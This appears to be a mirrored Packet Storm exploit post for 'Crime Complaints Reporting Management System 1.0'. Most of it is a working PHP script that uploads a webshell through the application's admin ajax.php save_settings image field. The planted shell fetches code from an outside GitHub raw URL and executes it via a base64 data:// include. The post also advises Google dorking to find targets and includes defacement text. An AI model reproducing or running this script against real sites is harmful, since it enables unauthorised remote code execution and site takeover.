Crime Complaints Reporting Management System 1.0 Shell Upload

Crime Complaints Reporting Management System 1.0 Shell Upload
2024-8-23 23:0:27 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏

=============================================================================================================================================
| # Title     : Crime Complaints Reporting Management System 1.0 code injection Vulnerability                                               |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip               |
=============================================================================================================================================poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This payload injects php code of your choice into an SHELL.php file. 
[+] save payload as poc.php
[+] usage from cmd : C:\www\test>php 1.php target.com
[+] payload :
<?php
function file_upload($website) {
    $file_name = "indoushka.php";
    $webshell_payload = "<?php
        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';
        \$ch = curl_init();
        curl_setopt(\$ch, CURLOPT_URL, \$url);
        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);
        \$output = curl_exec(\$ch);
        curl_close(\$ch);
        if (\$output) {
            include 'data://text/plain;base64,' . base64_encode(\$output);
        }
    ?>";
    $post_fields = array(
      'action' => '',
        'name' => 'Hacked By Indoushka',
        'email' => '[email protected]',
        'contact' => '00213771818860',
        'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),
        'about' => 'Hacked By Indoushka',
        'qty' => '1'
    );
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$website/admin/ajax.php?action=save_settings");
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
    echo "(+) Shell uploaded successfully.\n";
    echo "(+) Access the shell at: $website/admin/assets/uploads/\n";
}
if ($argc != 2) {
    echo "(+) Usage: php " . $argv[0] . " <website URL>\n";
    echo "(+) Example: php " . $argv[0] . " http://example.com\n";
    exit(-1);
}
$website = $argv[1];
file_upload($website);
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

文章来源: https://packetstormsecurity.com/files/180343/ccrms10-shell.txt
如有侵权请联系:admin#unsafe.sh